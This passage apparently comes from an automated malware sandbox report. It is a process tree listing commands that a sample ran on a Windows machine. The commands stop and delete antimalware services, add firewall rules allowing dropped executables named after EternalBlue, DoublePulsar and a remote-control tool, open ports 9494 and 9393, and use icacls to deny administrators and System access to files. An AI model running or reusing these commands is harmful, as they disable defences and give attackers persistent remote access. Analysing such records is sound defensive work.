                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                          sc config appmgmt start= auto
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:776
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sc delete swprv
                                                                                                                                                                        3⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:1596
                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                          sc delete swprv
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:2140
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sc stop mbamservice
                                                                                                                                                                        3⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:1788
                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                          sc stop mbamservice
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:4260
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4024
                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                            sc stop bytefenceservice
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            PID:2424
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4092
                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                              sc delete bytefenceservice
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:3640
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c sc delete mbamservice
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4524
                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                sc delete mbamservice
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:4232
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c sc delete crmsvc
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5724
                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                  sc delete crmsvc
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                  PID:5564
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c sc delete "windows node"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5644
                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                    sc delete "windows node"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:2576
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1628
                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                      sc stop Adobeflashplayer
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:3200
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:2448
                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                      sc delete AdobeFlashPlayer
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:4908
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c sc stop MoonTitle
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:3256
                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                        sc stop MoonTitle
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:1820
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:5652
                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                          sc delete MoonTitle"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                          PID:3340
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sc stop AudioServer
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1676
                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                            sc stop AudioServer
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                            PID:4196
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c sc delete AudioServer"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1472
                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                              sc delete AudioServer"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:3624
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4536
                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                sc stop clr_optimization_v4.0.30318_64
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                PID:2936
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1176
                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                  sc delete clr_optimization_v4.0.30318_64"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                  PID:4140
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4628
                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                    sc stop MicrosoftMysql
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:1716
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:5920
                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                      sc delete MicrosoftMysql
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:3168
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    PID:1144
                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                      netsh advfirewall set allprofiles state on
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:1164
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4524
                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                        netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                        PID:2576
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5064
                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                          netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                          PID:1644
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1116
                                                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                            netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:3924
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:5412
                                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                              netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                              PID:5748
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2308
                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                PID:748
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5028
                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                  netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                  PID:5580
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                PID:5280
                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                  netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                  PID:4024
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4536
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                    netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                    PID:2196
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:948
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                      netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                      PID:624
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:3968
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                        netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                        PID:5420
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:4716
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                          netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                          PID:1740
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:1144
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                            netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                            PID:5776
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:2112
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                              netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                              PID:6132
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:4208
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                PID:6116
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:5328
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                  netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                  PID:4780
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:5748
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                    netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                    PID:4444
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:784
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                      netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                      PID:3276
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4556
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                        netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                        PID:5580
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:5996
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                          netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                          PID:2408
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4008
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                            netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                            PID:624
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                          PID:3528
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                            icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                            PID:4516
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:5860
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                              icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                              PID:3924
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:3576
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                PID:4088
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:5564
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                  icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                  PID:3068
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:1628
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                    icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                    PID:4272
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:2124
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                      icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                      PID:5956
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:5700
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                        PID:3144
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                      PID:5688
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                        PID:1868
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:328
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                          PID:4536
